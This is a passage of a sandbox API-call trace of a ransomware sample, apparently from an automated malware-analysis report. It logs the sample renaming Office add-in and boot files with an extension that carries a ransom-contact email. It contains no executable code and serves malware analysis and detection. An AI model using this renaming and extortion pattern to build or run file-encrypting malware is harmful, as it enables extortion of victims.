CloseHandle (hObject=0x52c) returned 1 [0167.568] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.568] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.568] CloseHandle (hObject=0x52c) returned 1 [0167.569] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.569] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.570] CloseHandle (hObject=0x52c) returned 1 [0167.570] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.570] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.571] CloseHandle (hObject=0x52c) returned 1 [0167.572] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.572] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.572] CloseHandle (hObject=0x52c) returned 1 [0167.573] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.573] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.573] CloseHandle (hObject=0x52c) returned 1 [0167.575] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.575] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCH.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgch.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.575] CloseHandle (hObject=0x52c) returned 1 [0167.936] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.936] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.937] CloseHandle (hObject=0x434) returned 1 [0172.480] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.480] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\PowerViewRes.el.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\powerviewres.el.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.614] CloseHandle (hObject=0x484) returned 1 [0172.759] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.759] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\PowerViewRes.et.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\powerviewres.et.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.760] CloseHandle (hObject=0x51c) returned 1 [0172.774] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.774] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\PowerViewRes.eu.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\powerviewres.eu.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.774] CloseHandle (hObject=0x51c) returned 1 [0172.781] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.781] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\PowerViewRes.fi.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\powerviewres.fi.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.782] CloseHandle (hObject=0x51c) returned 1 [0172.786] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.786] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\PowerViewRes.fr.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\powerviewres.fr.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.786] CloseHandle (hObject=0x51c) returned 1 [0172.793] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.793] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\PowerViewRes.gl.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\powerviewres.gl.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.793] CloseHandle (hObject=0x51c) returned 1 [0172.799] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.799] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\PowerViewRes.he.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\powerviewres.he.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.799] CloseHandle (hObject=0x51c) returned 1 [0173.769] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.769] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\PowerViewRes.pt.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\powerviewres.pt.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.770] CloseHandle (hObject=0x4c4) returned 1 [0173.776] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.776] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\PowerViewRes.pt-PT.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\powerviewres.pt-pt.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.777] CloseHandle (hObject=0x4c4) returned 1 [0173.786] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.786] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\PowerViewRes.ro.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\powerviewres.ro.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.786] CloseHandle (hObject=0x4c4) returned 1 [0173.794] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.794] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\PowerViewRes.ru.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\powerviewres.ru.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.794] CloseHandle (hObject=0x4c4) returned 1 [0173.802] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.802] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\PowerViewRes.sk.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\powerviewres.sk.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.802] CloseHandle (hObject=0x4c4) returned 1 [0173.808] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.808] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\PowerViewRes.sl.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\powerviewres.sl.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.809] CloseHandle (hObject=0x4c4) returned 1 [0175.885] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.905] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hi\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hi\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hi\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hi\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hr\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hr\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\hr\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\hr\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.248] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ja\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ja\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ja\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ja\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\kk\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\kk\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\kk\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\kk\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ko\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ko\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ko\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ko\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703110 | out: hHeap=0x6a0000) returned 1 [0178.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b5d8 | out: hHeap=0x6a0000) returned 1 [0178.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3d60048 | out: hHeap=0x6a0000) returned 1 [0178.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3d70050 | out: hHeap=0x6a0000) returned 1 [0178.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3e66020 | out: hHeap=0x6a0000) returned 1 [0178.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7030e0 | out: hHeap=0x6a0000) returned 1 [0178.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ccd0 [0178.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ccd0, Size=0x20) returned 0x458c240 [0178.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cbe0 [0178.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cbe0, Size=0x20) returned 0x458c448 [0178.471] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.471] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.474] Wow64DisableWow64FsRedirection (in: OldValue=0x327ff50 | out: OldValue=0x327ff50*=0x1) returned 1 [0178.474] lstrlenW (lpString="kernel32.dll") returned 12 [0178.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c448 | out: hHeap=0x6a0000) returned 1 [0178.474] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 Thread: id = 45 os_tid = 0xe80 [0155.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3d80938 [0155.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3d90940 [0155.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7035a8 [0155.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b5e8 [0155.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703458 [0155.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x3f7d020 [0155.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703578 [0155.155] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703578, Size=0x20) returned 0x6ddf70 [0155.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7034b8 [0155.155] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7034b8, Size=0x20) returned 0x6dde80 [0155.156] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.156] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.156] Wow64DisableWow64FsRedirection (in: OldValue=0x33bff50 | out: OldValue=0x33bff50*=0x0) returned 1 [0155.156] lstrlenW (lpString="kernel32.dll") returned 12 [0155.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.156] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.156] Sleep (dwMilliseconds=0x64) [0155.521] Sleep (dwMilliseconds=0x64) [0155.779] Sleep (dwMilliseconds=0x64) [0156.294] Sleep (dwMilliseconds=0x64) [0156.922] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0156.922] lstrlenW (lpString="bootspaces.dll") returned 14 [0156.922] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.923] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=95648) returned 1 [0156.923] CloseHandle (hObject=0x340) returned 1 [0156.924] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0156.924] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootspaces.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.445] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.445] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.445] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0157.445] lstrlenW (lpString=".doc") 